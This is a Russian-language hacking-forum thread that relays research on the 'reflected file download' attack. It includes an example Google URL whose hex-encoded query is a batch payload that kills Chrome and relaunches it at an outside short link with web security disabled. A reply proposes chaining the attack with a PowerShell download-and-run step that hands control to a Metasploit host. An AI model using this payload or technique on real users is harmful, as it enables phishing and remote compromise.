Основан 26 Июля 2013 года
freehacks.ru fhacks.me fhacks.pw fhacksnplmzxaaoo.onion
HashFlare

Показано с 1 по 2 из 2
  1. #1
    TopicStarter
    Аватар для Fischer2014

    Статус
    Offline
    Регистрация
    25.04.2014
    Сообщений
    377
    Репутация
    143 + / -
    Программист

    Уязвимость с «отражённым» скачиванием файла

    Новый вектор атаки [Только зарегистрированные могут видеть это. ] позволяет передавать на компьютер пользователя исполняемые файлы, используя домены легитимных провайдеров, таких как Microsoft, Google и т.д. Это значительно облегчает фишинг, потому что жертва не видит опасности.

    [Только зарегистрированные могут видеть это. ] предусматривают передачу параметров в URI через использование точки с запятой («;») в универсальном идентификаторе ресурса. Многие веб-сервисы поддерживают эту функцию.

    Таким образом, если веб-сайт принимает параметры из адресной строки, то мы можем передавать ему произвольный контент. Но есть один нюанс. Сами браузеры не совсем корректно работают с параметрами после точки с запятой. Если там поместить содержимое файла, то браузер воспримет параметры как файл и сохранит его на компьютер жертвы.

    Пример параметров, которые сохраняются как файл

    Код:
    https://www.google.com/s;/ChromeSetup.bat;/ChromeSetup.bat?gs_ri=psy-ab&q=%22%7c%7c%74%61%73%6b%6b%69%6c%6c%20%2f%46%20%2f%49%4d%20%63%68%2a%7c%6d%64%7c%7c%73%74%61%72%74%20%63%68%72%6f%6d%65%20%70%69%2e%76%75%2f%42%32%6a%6b%20%2d%2d%64%69%73%61%62%6c%65%2d%77%65%62%2d%73%65%63%75%72%69%74%79%20%2d%2d%64%69%73%61%62%6c%65%2d%70%6f%70%75%70%2d%62%6c%6f%63%6b%69%6e%67%7c%7c
    Хотя атака не предусматривает несанкционированное выполнение кода, она всё равно представляет некоторую опасность. С точки зрения пользователя кажется, что файл скачивается с легитимного сервера (Microsoft, Google и т.д.), так что у жертвы высокая степень доверия к этому файлу и её можно подтолкнуть к запуску программы.



    К тому же, Windows 7 всё-таки запускает файлы *.bat или *.cmd на выполнение без предупреждения, если в названии файла упоминаются слова “setup”, “install” или “update”.

    В марте 2014 года автор — Орен Хафиф (Oren Hafif), исследователь безопасности из Trustwave SpiderLabs — уведомил об уязвимости Microsoft и Google. Первая до сих пор работает над выпуском патчей, а Google оперативно устранила уязвимости и обновила инфраструктуру.
    C\C++, C#, PHP

  2. 3 пользователя(ей) сказали cпасибо:
  3. #2
    Заблокирован по собственному желанию
    Аватар для DeNZeL

    Статус
    Offline
    Регистрация
    29.10.2014
    Сообщений
    455
    Репутация
    140 + / -
    Безопасность
    А можно ли заменить первоначальный файл, левым. Если имя будет такое же?
    Если да то PowerShell никто не отменял, и есть хороший пример скачивания и запуска файлов в атаке HID KEYBOARD ATTACK, когда на компе жертвы запускается powershell сценарий, затем скачивает с удаленного компьютера некий код и запускает его, передавая доступ на атакующий компьютер с Metasploit. Код могу скинуть.

Метки этой темы

Ваши права

  • Вы не можете создавать новые темы
  • Вы не можете отвечать в темах
  • Вы не можете прикреплять вложения
  • Вы не можете редактировать свои сообщения
  •  
Информация на сайте предоставлена исключительно в ознакомительных целях, использование знаний в противозаконных целях преследуется по закону! Администрация не несет ответственности за ваши деяния.